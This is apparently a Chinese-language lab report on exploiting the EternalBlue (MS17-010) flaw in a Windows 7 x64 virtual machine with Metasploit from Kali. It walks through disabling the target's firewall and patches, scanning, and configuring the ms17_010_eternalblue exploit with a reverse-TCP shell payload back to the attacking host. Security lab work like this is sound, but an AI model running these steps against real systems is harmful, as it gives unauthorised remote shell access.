网安报告1–利用msfconsole攻击win7x64永恒之蓝漏洞

0x01 实验准备

首先我们要准备的环境是kali(攻击方),一台win7虚拟机(靶机),我用的是kali19.04和win7x64。由于要获得对方靶机的shell,所以两台电脑的IP我们都要知道,因为之后会用上。因为我的虚拟机当时应该是在同一个网络环境下配置的,所以肯定是互通信道的。

0x02 IP查询

kali查询IP:

ip add

这里查到我们kali的ip为192.168.175.129

win7查询IP:

ipconfig

为了确保攻击的成功,首先我们关闭win7的防火墙,其次把所有的补丁都卸掉。win7的防火墙关闭方法,搜索防火墙,找到相关设置,关掉它。之后就是补丁,很多我们找到的镜像都打过永恒之蓝的补丁,所以我们要稍微的关一下。

我们先在kali上跑一下nmap,一是看看445端口是不是已经开放,二来是看看局域网中两台机子是否连接正常。

nmap -Fn 192.168.175.134

0x03 msfconsole的配置与使用

其实步骤与书上的步骤差不多,但是由于书上是对XP系统进行的攻击,所以使用的漏洞是ms08-067。但是我们是对win7的漏洞进行攻击,所以在第一步就有了一点点区别,我们需要使用的漏洞是ms17_010。

首先我们启动msf

msfconsole

然后就是search模块

search ms17_010

注释1:auxiliary/scanner/smb/smb_ms17_010 :一个检测程序,设置目标主机,网段,它会自动检测是否存在永恒之蓝漏洞

注释2:exploit/windows/smb/ms17_010_eternalblue: 永恒之蓝的exp

紧接着是auxiliary/scanner/smb/smb_ms17_010的检验:

use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 192.168.175.134
run

配置IP后就可以运行这个模块。

192.168.175.134:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)

发现是永恒之蓝漏洞,下面我们就开始组装exp与payload。

use exploit/windows/smb/ms17_010_eternalblue //进入exp模块
set RHOSTS 192.168.175.134 //配置目标IP
set Lhost 192.168.175.129 //配置本机IP
set payload windows/x64/shell_reverse_tcp //payload

此时我们就完成了基本步骤。

win7全版本通用

0x04 攻击

exploit

当你看见如上情况的时候,说明攻击成功了。